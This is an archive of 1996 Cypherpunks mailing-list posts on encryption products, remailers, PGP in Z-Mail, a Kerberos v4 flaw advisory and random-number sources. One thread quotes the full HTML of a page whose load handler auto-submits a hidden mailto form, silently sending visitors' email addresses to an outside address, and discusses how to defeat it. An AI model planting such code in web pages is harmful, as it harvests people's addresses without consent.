From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Wed, 21 Feb 1996 06:32:13 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <199602200812.DAA05762@thor.cs.umass.edu>
Message-ID: <Pine.BSD/.3.91.960220131448.9829D-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 20 Feb 1996 lmccarth@cs.umass.edu wrote:

> IPG Sales writes:
> > Obviously you want to criticise without investigation. He who knows all, 
> >    knows little, or nothing accoring to Einstein.
> 

I apologize but I do believe that you prejudged it without bothering to 
inquire of us, or inquire further. We are now anxious to cooperate with 
cypherpunks and let them show us how silly the system is. We will cooperate
fully, with minor but we believe accpeptableimitations and subject 
to reciprocation. 


> That's a rather disingenuous statement. I read your press release, and then
> I spent a while browsing through everything that seemed germane on your
> web pages. But my investigation of all the material you had presented to the
> world yielded very little in the way of hard facts about the security of the 
> IPG system. I responded to what I'd been able to find.
> 
> Future technical investigations of IPG would be greatly aided if you placed
> on your web pages some of the technical details you have at last revealed
> here. I just checked your web pages again, and they still don't explain the
> actual workings of the system at all.
> 
> -Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
> 	your bargains, push your papers, win your medals, fuck your strangers;
> 	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)
> 
We will not post it to Internet, but we will provide it to the 
Cipherpunks, a large selected set choisen by Derek Atkins or 
his designee. 

Some men are as sure of their opinions as they are of what they know - 
Shakespeare.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: remailer@meaning.com (Anonymous)
Date: Wed, 21 Feb 1996 03:15:44 +0800
To: cypherpunks@toad.com
Subject: New Remailer
Message-ID: <199602201824.NAA19539@black.colossus.net>
MIME-Version: 1.0
Content-Type: text/plain


The Nemesis Remailer is online at remailer@meaning.com. It supports 
Type 1 (Ghio) and Type 2 (Mixmaster) messages. It is still in beta 
testing. Comments to remailer-owner@meaning.com would be appreciated.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yanni <jon@aggroup.com>
Date: Wed, 21 Feb 1996 13:37:28 +0800
To: "Mark M." <cypherpunks@toad.com
Subject: Re: JavaScript to grab email
Message-ID: <9602201325.AA28317@jon>
MIME-Version: 1.0
Content-Type: text/plain


> I visited the page using a fake e-mail address, and have yet to be sent
> a confirmation e-mail.

When it sends the mail, netscape puts your email address that you put
into the message in the From: field. This is what that JavaScript is
doing. It is not reading any of your files or doing anything "illegal",
it is just taking advantage of the way that Netscape sends email. ;)

Obviously, either putting nothing or a bogus email address will cause
you to not get a confirmation e-mail.

It is one of those "why didn't I think of it" things. ;) Simple
yet effective. :)

-jon

Jon S. Stevens         yanni@clearink.com
ClearInk WebMagus      http://www.clearink.com/
finger pgp@sparc.clearink.com for pgp pub key
My apologies for the loss of bandwidth. :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@orodruin.CS.Berkeley.EDU (David A Wagner)
Date: Wed, 21 Feb 1996 14:13:51 +0800
To: cypherpunks@toad.com
Subject: PGP integrated into Z-Mail
Message-ID: <9602202130.AA09986@espresso.CS.Berkeley.EDU.mammoth>
MIME-Version: 1.0
Content-Type: text/plain


NCD/Z-Mail announces that they've integrated PGP support into their
popular email client.  This is good news, folks.

A chicken in every pot, and PGP on every desktop!

ObDisclaimer: I've not tried their PGP interface; I'm not associated
	with Z-Mail; I know no history; I always misquote everyone.

--

Press Contacts:

Mike Harrigan			Richard Burger/Shari Dupart
NCD Software Corporation		Miller/Shandwick Technologies
(415) 919-2886			415/962-9550
mikeh@ncd.com			rburger@millerwest.com
				sdupart@millerwest.com

FOR IMMEDIATE RELEASE

NCD Software Unveils New Integrated Security Solution for Z-Mail for 
Windows, Optimizing Internet Mail Protection

New ViaCrypt PGP Solution, Customized for Z-Mail, Brings Users Special 
Encryption, Decryption and Digital Signature Capabilities

	E-MAIL WORLD, San Jose, Calif., February 20, 1996 - NCD 
Software Corporation today unveiled a new optional security feature for its 
Z-Mail for Windows electronic messaging client, offering users the best 
integrated point-to-point security now available for Internet e-mail.
	ViaCrypt, a division of Lemcom Systems, Inc., worked with NCD 
Software to develop and customize the integration of Z-Mail for Windows and 
ViaCrypt(TM) PGP(TM) software.  With just a few clicks of the mouse, Z-Mail 
customers using ViaCrypt PGP can now encrypt the e-mail message bodies and 
arbitrary data file attachments they send, as well as apply digital signatures.  
Receivers can use ViaCrypt PGP to decrypt the messages and files and to 
verify the signatures.  NCD Software unveiled the new person-to-person 
security feature today at E-Mail World, Booth 434, in San Jose, CA.
	Z-Mail is NCD Software's award-winning cross-platform e-mail 
software.  Based on Internet-standard protocols that include POP, SMTP and 
MIME, Z-Mail has been acclaimed for its ease of use and highly integrated 
features, including a powerful scripting language, Z-Script, for enhanced 
customization capabilities.
	ViaCrypt PGP allows Z-Mail users to create, send and read secure 
messages by simple menu selection.  The integration of ViaCrypt PGP into 
Z-Mail was achieved through Z-Mail's exclusive scripting capabilities and a 
front-end built specifically for  by ViaCrypt.  Message bodies as well as arbitrary 
file attachments are secured through public-key cryptography:  only the person 
with the corresponding private key can unlock the encrypted file. 
	Digital signatures, another valuable security application provided 
by ViaCrypt PGP, allow  users to verify that the message they received was 
sent by a specific person and that the message was not altered.
	"Security has become our customers' primary consideration when it 
comes to Internet mail," said Mike Harrigan, vice president of marketing at 
NCD Software.  "The integrated solution of Z-Mail and ViaCrypt PGP reflects 
our commitment to provide our corporate customers with an easy, secure e-mail 
system."
	Dave Barnhart, product manager at ViaCrypt, commented, 
"Combined with the new ViaCrypt PGP encryption and decryption features, 
Z-Mail now gives users a simple point-and click solution for assuring security 
when conducting critical business transactions via the Internet."
	Z-Mail for Windows is available from NCD Software, and is priced 
at $165 for single users and $95 per user for 200-user licenses.  ViaCrypt PGP, 
which includes the front end that integrates it with Z-Mail for Windows, is priced 
at $169.00 for single users and $50 per user for 200 to 499 user licenses.  It is 
available now from ViaCrypt and will be available from NCD in March.
	A full review of Z-Mail for Windows and other Z-Mail products is 
available over NCD Software's site on the World Wide Web at 
http://www.ncd.com/Z-Code/zcode.html, or via e-mail at info@z-code.com.  
ViaCrypt information is available over the Web at http://www.viacrypt.com.
	NCD Software Corporation is a wholly owned subsidiary of 
Network Computing Devices, Inc. (NASDAQ: NCDI).  The company provides 
desktop information access solutions for network computing environments.  
NCD Software Corporations is a major supplier of network software products, 
including PC-Xware software integrating Microsoft Windows and DOS-based 
PCs into X/UNIX networks, Marathon, a TCP/IP network foundation, and 
Z-Mail, a cross-platform electronic-mail and messaging system for open systems 
environments.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 21 Feb 1996 12:07:43 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <m0tozlY-00091xC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 08:59 AM 2/20/96 -0800, Alan Bostick wrote:

>ObCrypto:  Would four years experience interpreting cryptic vanity
>plates while commuting on the Nimitz Freeway be a good qualification for
>an NSA cryptanalyst?  Would that experience also qualify me as a traffic
>analyst? 

An interesting movie out of the 1960's (which is just barely available by 
special order from Blockbuster video) is called "Sebastian."   English actor 
Dirk Bogarde plays "Sebastian," the head of a British code-cracking 
organization staffed by women.  Haven't seen it for a couple of decades.  As 
the opening credits roll, Sebastian has a random chance encounter with a 
woman on the street.  Without any other words, he asks her something like, 
"Spell your name backwards."  In a comparative instant she does so, and he
gives her his 
card, saying, "Call me if you want a job."  A few months later she does, and 
that's where the main story starts.

Jim Bell

jimbell@pacifier.com

Klaatu Burada Nikto
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSo2I/qHVDBboB2dAQGb8gP/Vrr2AweA3CZeSB1xUvlpLvAYX8jnvXNL
vHYNLtLl6NiVXIOVNtG/d7e+K5BgSHgjlme0BwqdEzI8NqNN5mbyM1VVeYqpl4SH
NK//1yyvABAQa4I20GZkFT6MU36iub7G6uDV2UdGqekCskmdE8uURa773KGe7aBL
NF6A0fthx2s=
=vvXl
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Wed, 21 Feb 1996 05:04:54 +0800
To: cypherpunks@toad.com
Subject: Internet Privacy Guaranteed
Message-ID: <Pine.BSD.3.91.960220133835.13539C@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Friend, 
 
 
                           (KEY #1) 
 
 
  Date: Mon, 19 Feb 1996 20:01:06 -0500
  From: "Perry E. Metzger" <perry@piermont.com>
  To: IPG Sales <ipgsales@cyberstation.net>
  Cc: cypherpunks@toad.com
  Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)

  [snip]  
 
  > ...keymanagem,ent makes RSA systems unmanageable for large 
  > organizations - offer such a suystem to Merrill Lynch and be 
  > laughed out of the office.... 

  [snip] 

  Even private key systems are quite workable. I actually work 
  with these firms [large organizations] -- its what I do for a 
  living. They have existing systems based on KDCs (do you even 
  know what a KDC is?) and they function just fine. As for public 
  key technologies, they [large organizations] are in many cases 
  implementing technologies based on public key system. 
 
  [snip] 
 
                            (KEY #2) 
 
 
  Date: Mon, 19 Feb 1996 20:37:42 -0500
  From: "Perry E. Metzger" <perry@piermont.com>
  To: IPG Sales <ipgsales@cyberstation.net>
  Cc: cypherpunks@toad.com
  Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.) 
 
  [snip] 
 
  IPG Sales writes:
  > there is no need in talking in circles - You may think that 
  > you know everything there is to know about encryption, but 
  > believe me, there is a lot more for you to learn - I do not 
  > now what KDC's are,

  Key Distribution Centers, the center of Needham-Schroeder and 
  similar key management protocols, like the Kerberos protocols. 
 
  [snip] 
 
 
                             (KEY #3) 
 
  
  Date: Tue, 20 Feb 1996 01:28:01 -0700
  From: Nelson Minar <nelson@santafe.edu>
  To: cypherpunks@toad.com
  Subject: breakable session keys in Kerberos v4 
 
  I'm a bit suprised this hasn't turned up yet on Cypherpunks.  A couple
  of forwarded messages: first, an announcement made Fri Feb 16 by Gene
  Spafford at COAST about an exploitable flaw they've found in Kerberos,
  and then a comment on the www-security list that it is due to a bad
  random number generator. Same old story! 
 
  The message (lifted from the COAST web site)
 
  [snip] 
 
  (a comment I found in reply [to the COAST message]) 
 
  ------- Start of forwarded message -------
  From: jis@mit.edu (Jeffrey I. Schiller)
  Subject: Re: Kerberos Vulnerability
  Newsgroups: hks.lists.www-security
  Date: 19 Feb 1996 21:42:08 -0500
  Organization: HKS, Inc.
  Path: hks.net!news-mail-gateway!owner-www-security
  Lines: 8
  Sender: root@hks.net
  Message-ID: <ad4e9fc40602100421be@[18.162.1.1]>
  NNTP-Posting-Host: bb.hks.net
 
  There will be a fix distributed by MIT later this week. The problem is 
  that the random number generator in V4 is worse then we thought! The 
  fix is to retrofit the V5 generator (which is decent) into the V4 KDC. 
  Note: Only the KDC needs to be updated, clients and servers are unaf- 
  fected. 
 
                                -Jeff
 
 
  ------- End of forwarded message -------
 
 
 
                               (KEY #4) 
 
 
  Kerberos offers a better network security model than ignoring 
  network security entirely.  Unfortunately, it is plagued with 
  holes, from windows that remain "authenticated" for hours while 
  the user is at lunch, to passwords that are stored in plain text 
  on the authentication server. 
 
        Page 553 of: 

        Evi Nemeth, Garth Snyder, Scott Seebass, Trent R Hein. 
 
        UNIX System Administration Handbook. Second Edition. 
 
        Prentice Hall PTR. 
 
        1995. 
 
        ISBN: 0 13 151051 7 
 
        email: sa-book@admin.com 
 
        http://www.admin.com 
                  
 
 
  Cordially, 
 
  Jim 
 
 
 
  NOTE.  The above message excerpts are reformatted. 
 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: asantos@retesa.es (Agustin Santos Mendez)
Date: Tue, 20 Feb 1996 21:35:59 +0800
To: nelson@santafe.edu>
Subject: breakable session keys in Kerberos v4
Message-ID: <9602201400.AA00692@sun2.retesa.es>
MIME-Version: 1.0
Content-Type: text/plain


Se han encontrado huecos en Kerberos v4. Aqui teneis la informacion:

>Return-Path: <owner-cypherpunks@toad.com>
>Received: from control (controli.retesa.es) by sun2.retesa.es (5.x/SMI-SVR4)
>	id AA01592; Tue, 20 Feb 1996 09:59:01 GMT
>Received: by control (SMI-8.6/SMI-SVR4)
>	id DAA19612; Tue, 20 Feb 1996 03:02:47 -0800
>Received: from relay3.uu.net(192.48.96.8) by control via smap (V1.3)
>	id sma019610; Tue Feb 20 03:02:35 1996
>Received: from toad.com by relay3.UU.NET with SMTP 
>	id QQadse08697; Tue, 20 Feb 1996 04:01:50 -0500 (EST)
>Received: by toad.com id AA24982; Tue, 20 Feb 96 00:28:15 PST
>Received: from sfi.santafe.edu by toad.com id AA24976; Tue, 20 Feb 96
00:28:11 PST
>Received: from nelson.santafe.edu by sfi.santafe.edu (4.1/SMI-4.1)
>	id AA02389; Tue, 20 Feb 96 01:24:08 MST
>Received: (from nelson@localhost) by nelson.santafe.edu (8.7.1/8.7.1) id
BAA21074; Tue, 20 Feb 1996 01:28:01 -0700
>Date: Tue, 20 Feb 1996 01:28:01 -0700
>Message-Id: <199602200828.BAA21074@nelson.santafe.edu>
>From: Nelson Minar <nelson@santafe.edu>
>To: cypherpunks@toad.com
>Subject: breakable session keys in Kerberos v4
>Sender: owner-cypherpunks@toad.com
>Precedence: bulk
>Content-Type: text
>Status: O
>
>I'm a bit suprised this hasn't turned up yet on Cypherpunks.  A couple
>of forwarded messages: first, an announcement made Fri Feb 16 by Gene
>Spafford at COAST about an exploitable flaw they've found in Kerberos,
>and then a comment on the www-security list that it is due to a bad
>random number generator. Same old story!
>
>The message (lifted from the COAST web site)
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Personnel at the COAST Laboratory (Computer Operations, Audit, and
>Security Technology) at Purdue University have discovered a
>vulnerability in current versions of the Kerberos security system.
>Graduate students Steve Lodin and Bryn Dole, working with Professor
>Eugene Spafford, have discovered a method whereby someone without
>privileged access to most implementations of a Kerberos 4 server can
>nonetheless break secret session keys issued to users.  This means that
>it is possible to gain unauthorized access to distributed services
>available to a user without knowing that user's password. This method
>has been demonstrated to work in under 1 minute, on average, using a
>typical workstation, and sometimes as quickly as 1/5 second.
>
>The Kerberos system was developed at MIT in the mid-1980s, and has
>been widely adopted for security in distributed systems worldwide.
>Kerberos is most often used on UNIX platforms by various vendors, and
>is often enhanced, sold and supported by 3rd-party vendors for use in
>academic, government, and commercial environments.
>
>The same researchers at COAST have also found a small, theoretical
>weakness in Kerberos version 5 that would allow similar access, given
>some additional information and considerable preliminary computation.
>Kerberos version 5 does not exhibit the same weakness as described
>above for Kerberos version 4.
>
>The researchers at COAST had intended to release the specific details
>of the problem to affected vendors and incident response teams during
>the week of February 19, prior to making a public announcement of
>their findings.  However, as rumors have begun to circulate and
>several representatives of the news media have apparently received
>indication of the problem, we are releasing this preliminary
>announcement at this time.
>
>Government and industry sponsors of the COAST Laboratory were made
>aware of the preliminary details of these findings in January (full
>sponsors receive early notification of significant discoveries as a
>result of COAST research).  Other affiliates of COAST as well as the
>world-wide network of FIRST computer incident response teams were made
>aware of the general nature of the findings during the week of
>February 5.  The original plan at COAST was to release specific
>details only to FIRST (Forum of Incident Response and Security Teams)
>teams and to MIT prior to announcement by affected vendors of a fix
>for these weaknesses.  The flaw in Kerberos version 4 is significant
>enough that disclosure of its details prior to a fix would allow
>someone with moderate programming skills to exploit it; there is
>currently no reason to believe that others know the details of the
>flaw and are exploiting it, so there is no immediate danger to the
>public that would warrant release of the details at this time.
>
>COAST personnel have been informed that MIT has already developed a
>fix for the flaw in version 4 Kerberos and is preparing it for
>release.  Additionally, COAST researchers are cooperating with MIT
>personnel to identify what (if any) fixes are necessary for version 5
>Kerberos. Users of either version of Kerberos should contact their
>vendors for details of any fixes that may be made available; vendors
>of products incorporating Kerberos should contact MIT directly for
>details of the problems and fixes.
>
>COAST is a research group of faculty and students dedicated to
>research into information security and computer crime investigation,
>and education in computer and network security.  It is the largest
>such university-based group in the United States.
>
>Information on COAST may be found on the WWW at
>  http://www.cs.purdue.edu/coast
>Information on FIRST teams may be found on the WWW at
>  http://www.first.org
>Information on MIT's Kerberos may be found on the WWW at
>  ftp://athena-dist.mit.edu/pub/kerberos/doc/KERBEROS.FAQ
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>Comment: Key @ ftp://ftp.cs.purdue.edu/pub/spaf/pers/pgpkey.asc
>
>iQCVAwUBMSZ42cpvK4P8DALVAQHg8QP/TRmqwP7vG32aaBjvbMof2iuVQ2bcWrg9
>p55KN5wBfrBzxq5/NE+6lodkqq2w1ib8q/47uYT1S8iR+z2tnbvL64dxrtDEh4iY
>iEWjfpTMtQxLmZ1gA3Sxxn4A+6KwlXq5z4Lp2BROUXyeSR7HPAEeEQucRNWkzz8o
>IOMHuBAcBKo=
>=yWxe
>-----END PGP SIGNATURE-----
>
>(a comment I found in reply)
>
>------- Start of forwarded message -------
>From: jis@mit.edu (Jeffrey I. Schiller)
>Subject: Re: Kerberos Vulnerability
>Newsgroups: hks.lists.www-security
>Date: 19 Feb 1996 21:42:08 -0500
>Organization: HKS, Inc.
>Path: hks.net!news-mail-gateway!owner-www-security
>Lines: 8
>Sender: root@hks.net
>Message-ID: <ad4e9fc40602100421be@[18.162.1.1]>
>NNTP-Posting-Host: bb.hks.net
>
>There will be a fix distributed by MIT later this week. The problem is that
>the random number generator in V4 is worse then we thought! The fix is to
>retrofit the V5 generator (which is decent) into the V4 KDC. Note: Only the
>KDC needs to be updated, clients and servers are unaffected.
>
>                                -Jeff
>
>
>------- End of forwarded message -------
>
>
Agustín Santos Méndez,            RETESA, S.A.
C/Orense 4, Planta 10. 28020 MADRID SPAIN.
Ph: +34.1.342.67.91                     Fax +34.1.597.28.77
E-mail: asantos@retesa.es   






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 21 Feb 1996 06:10:14 +0800
To: jimbell@pacifier.com
Subject: Re: Easy Nuclear Detonator
Message-ID: <01I1FTI556YKAKTJEQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jimbell@pacifier.com"  "jim bell" 20-FEB-1996 09:01:32.20

>As for the inclusion of your private note:  sorry again.  But at the time,
>it just didn't occur to me that you'd object to this.  "Nettiquette" is new
>to me.

	Ah. I understand mistakes. I've made one similar to this before,
although it was through not noticing that a mailing to me wasn't also to
Cypherpunks, rather than not knowing the (rather basic element of) Nettiquette
of not posting someone else's private email. Apology accepted.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Wed, 21 Feb 1996 11:34:24 +0800
To: Mike Rose <mrose@stsci.edu>
Subject: Re: JavaScript to grab email
In-Reply-To: <9602202009.AA09881@MARIAN.SOGS.STSCI.EDU>
Message-ID: <Pine.3.89.9602201426.A32004-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 20 Feb 1996, Mike Rose wrote:

> Sorry for the imprecision here.  I was referring to Netscape 2.0 on
> unix here.  Changing the email address known to netscape is
> insufficient for non-root users on unix systems, because sendmail will
> put your real address into the headers.

How about setting the mail proxy to something bogus? ;)
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 21 Feb 1996 06:52:49 +0800
To: abostick@netcom.com
Subject: Re: NET_run
Message-ID: <01I1FTP3FADEAKTJEQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"abostick@netcom.com" 20-FEB-1996 09:07:55.46

>should not be confused with Steve Jackson Games' GURPS Cyberpunk module
>for Jackson's GURPS role-playing system, which was published later.)

>"What the hell does this have to do with cryp%*##~~~

	Actually, it does. Steve Jackson Games (SJG) was raided by the Secret
Service for that game, in which the Secret Service showed their total
ignorance of computers by mistaking it for a "handbook of computer crime."
Since they're the ones also concerned with counterfeiting:
	A. this indicates something about how much one needs to worry about
		counterfeiting, and one reason that even with the new changes,
		US currency is still one of the easiest ones to counterfeit
		with modern technology.
	B. they're likely to be total idiots when it comes to digital cash

On the other hand on the last point, they did look at one private currency
scheme and deem it allowable, since the (physical) bucks in that case didn't
resemble US currency. The governmental group that _did_ have problems with it
was the SEC, who decided that since its non-inflationary qualities were based
on direct funding through a group of investments, it qualified as an
unlicensed mutual fund. Moral of the story: don't base it in the US, or don't
make it run off of investments.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 21 Feb 1996 06:35:35 +0800
To: cypherpunks@toad.com
Subject: Re: JavaScript to grab email
In-Reply-To: <9602201743.AA09495@MARIAN.SOGS.STSCI.EDU>
Message-ID: <Pine.LNX.3.91.960220141458.485A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 20 Feb 1996, Mike Rose wrote:

> >Probably there will soon be thousands of pages which include this code,
> >and people using Netscape 2.0 will be spammed with commercial messages.
> >So just put some false e-mail address in your Netscape browser to disable
> >this feature.
>
> Changing the email address known to netscape doesn't help.  Your email
> address is in the message sent, regardless of what netscape thinks
> your identity is.

I'm not sure I understand what you are saying.  The Javascript program
uses Netscape to send the e-mail.  The only way Netscape knows your actual
e-mail address is if you tell Netscape what it is.  The comments on the
page tell you that deleting your e-mail address from Netscape's config, or
supplying it with a false one, prevents the script from working.  I visited
the page using a fake e-mail address, and have yet to be sent a confirmation
e-mail.

BTW, here's the source for the page:

<HTML>
<HEAD>
</HEAD>
<BODY onLoad="document.mailme.submit()">
<!-- Howdy! yeah, the code is pretty darn simple, eh? Soon 1,000s of people
will be scamming email addresses in this manner. At least we discovered it
first. The real trick to make it stop? Put a bogus email address in your
browser's "email reply" ent. Or leave it blank-->
<form method=post name="mailme"
action="mailto:reply@simenon.popco.com?subject=scammed address">
<h3>Viewing this page automatically submits email to an address which then
sends you back email to prove it grabbed the message.</h3>
<input type=hidden name="scammed.the.address" value="did it">
</form>
</BODY></HTML>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMSofNbZc+sv5siulAQGV6QP/feZ59C51ZAjKkrvBUCdNOvhtJqQJsR2I
uigA5owTzecDXfnwCC3XB4w08ym0lgA1pwKcAEWl4hhOPyBmnerKbT2Q96Z5JMFe
LwQnbP78fDB/Sx101X5uYHh47tGGkfzGbMhjLcrVpTrpgIDMYBEKLtfyZknwI4xQ
Do9CPVr9lwM=
=XMTH
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 21 Feb 1996 08:37:47 +0800
To: thad@hammerhead.com
Subject: Re: Optical repeaters
Message-ID: <01I1FUFZ69LGAKTJEQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"thad@hammerhead.com" 20-FEB-1996 09:52:39.27

>But, and this is the interesting part; you cannot use this feature to tap
>the line.  Measuring either one of these photons would disturb the other,
>destroying the state that it has.

	I believe that all of this comes down to what and when is the
"waveform collapse" - what and when is observation. If any interaction with
something else counts as observation, then it won't work. This problem is
where one gets into the many worlds hypothesis et al.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Rose <mrose@stsci.edu>
Date: Wed, 21 Feb 1996 07:50:55 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: JavaScript to grab email
In-Reply-To: <9602201743.AA09495@MARIAN.SOGS.STSCI.EDU>
Message-ID: <9602201940.AA09764@MARIAN.SOGS.STSCI.EDU>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> On Tue, 20 Feb 1996 14:21:31 -0500 (EST), "Mark M." <markm@voicenet.com> said:

>On Tue, 20 Feb 1996, Mike Rose wrote:

>>Changing the email address known to netscape doesn't help.  Your email
>>address is in the message sent, regardless of what netscape thinks
>>your identity is.

>I'm not sure I understand what you are saying.  The Javascript program
>uses Netscape to send the e-mail.  The only way Netscape knows your actual
>e-mail address is if you tell Netscape what it is.  

Netscape doesn't need to know your email address.  Your email address
is put into the headers by sendmail.  Netscape will make a "from"
header of what you claim in the "indentity" field, but your real
address is also in the headers - "sender:" in mine.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Rose <mrose@stsci.edu>
Date: Wed, 21 Feb 1996 08:49:08 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: JavaScript to grab email
In-Reply-To: <9602201743.AA09495@MARIAN.SOGS.STSCI.EDU>
Message-ID: <9602201941.AA09775@MARIAN.SOGS.STSCI.EDU>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> On Tue, 20 Feb 1996 14:21:31 -0500 (EST), "Mark M." <markm@voicenet.com> said:

>I visited
>the page using a fake e-mail address, and have yet to be sent a confirmation
>e-mail.

That's a flaw in the auto-responder, which believes the false "from"
field.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 21 Feb 1996 13:39:48 +0800
To: cypherpunks@toad.com
Subject: Re: Chaotic physical systems as random number sources
Message-ID: <ad4f7bb904021004607c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:46 PM 2/20/96, E. ALLEN SMITH wrote:
>        I'm curious if anyone knows of any attempts to use a chaotic physical
>system (such as the famous double pendulum) as a source of random numbers. I
>did an Alta Vista check on the problem, and all I turned up was a paper (in
>postscript, so I couldn't read it) on all mathematical pseudorandom number
>generators being logical chaotic systems. (It's at
>http://csl.ncsa.uiuc.edu/~herring/publications/rand.ps).
>        One problem that I can see is that of strange attractors. While the
>path through each time would be different, they're still _close_ to each other,
>and a practical mechanical system might not be sensitive enough to pick up the
>differences.

This has come up several times. As I recall, some guys at a Navy research
lab (San Diego?) were claiming to have a "chaotic encryption" system.

As to using chaotic systems for PRNGs or RNGs, the "turbulent flow over
disk drive platters causes speed variations" idea, described recently, is
of course an example of nominally using a chaotic/turbulent system to
defeat predictability.

I have at least a couple of paragraphs on chaos and crypto in my Cyphernomicon.

--Tim


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 21 Feb 1996 08:37:35 +0800
To: cypherpunks@toad.com
Subject: Chaotic physical systems as random number sources
Message-ID: <01I1FUPJ56PQAKTJEQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I'm curious if anyone knows of any attempts to use a chaotic physical
system (such as the famous double pendulum) as a source of random numbers. I
did an Alta Vista check on the problem, and all I turned up was a paper (in
postscript, so I couldn't read it) on all mathematical pseudorandom number
generators being logical chaotic systems. (It's at
http://csl.ncsa.uiuc.edu/~herring/publications/rand.ps).
	One problem that I can see is that of strange attractors. While the
path through each time would be different, they're still _close_ to each other,
and a practical mechanical system might not be sensitive enough to pick up the
differences.
	Thanks,
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nemesis <richier@Onramp.NET>
Date: Wed, 21 Feb 1996 12:17:21 +0800
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <312A33F8.D93@onramp.net>
MIME-Version: 1.0
Content-Type: text/plain


How do i get off the mailing list??????




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mailer-Daemon@wipinfo.soft.net (Mail Delivery Subsystem)
Date: Tue, 20 Feb 1996 17:48:28 +0800
To: cypherpunks@toad.com
Subject: Returned mail: User unknown
Message-ID: <9602200933.AB07900@s.wipinfo.soft.net>
MIME-Version: 1.0
Content-Type: text/plain


   ----- Transcript of session follows -----
550 rajr... User unknown

   ----- Unsent message follows -----
Return-Path: <cypherpunks@toad.com>
Received: by s.wipinfo.soft.net (4.1/SMI-4.1)
